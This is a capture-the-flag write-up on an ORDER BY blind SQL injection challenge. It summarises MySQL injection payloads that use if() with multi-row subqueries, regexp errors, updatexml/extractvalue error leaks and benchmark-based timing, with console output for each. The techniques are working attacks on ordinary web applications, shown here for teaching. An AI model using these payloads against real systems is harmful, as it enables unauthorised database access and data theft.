http://game.sycsec.com:2008/Steam/1.php?type=DESC
Challenge URL. It is an ORDER BY blind injection. Table names are compared case-insensitively here (the default MySQL collation is case-insensitive), so using a direct string comparison as the boolean condition gives wrong answers; comparing with ascii() avoids the problem.

sleep() is disabled here, presumably to stop people from simply pointing sqlmap at it.

A brief summary of ORDER BY injection techniques.

Judging by a difference in the returned results

The value used in ORDER BY must be a single scalar, but `select 1 from INFORMATION_SCHEMA.SCHEMATA` returns several rows. When the condition is false the subquery is evaluated and MySQL raises an error; when it is true the query returns normally, so the two cases are distinguishable.

```sql
mysql> select * from users order by if((1=2),2,(select 1 from INFORMATION_SCHEMA.SCHEMATA));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select * from users order by if((1=1),2,(select 1 from INFORMATION_SCHEMA.SCHEMATA));
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
```


regexp

```sql
mysql> SELECT * from users order by 1,(select 1 regexp if(1=2,1,0x00));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> SELECT * from users order by 1,(select 1 regexp if(1=1,1,0x00));
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
```

updatexml

```sql
updatexml:
mysql> SELECT user,host from mysql.user order by updatexml(1,if(1=1,user(),2),1);
ERROR 1105 (HY000): XPATH syntax error: '@localhost'
extractvalue:
mysql> SELECT user,host from mysql.user order by extractvalue(1,if(1=1,user(),2));
ERROR 1105 (HY000): XPATH syntax error: '@localhost'
```

Time-based

Since sleep() is blocked on this challenge, a time-based probe has to rely on something else that is slow when the condition is true, such as benchmark() or a heavy cartesian-product subquery placed in the true branch of the if().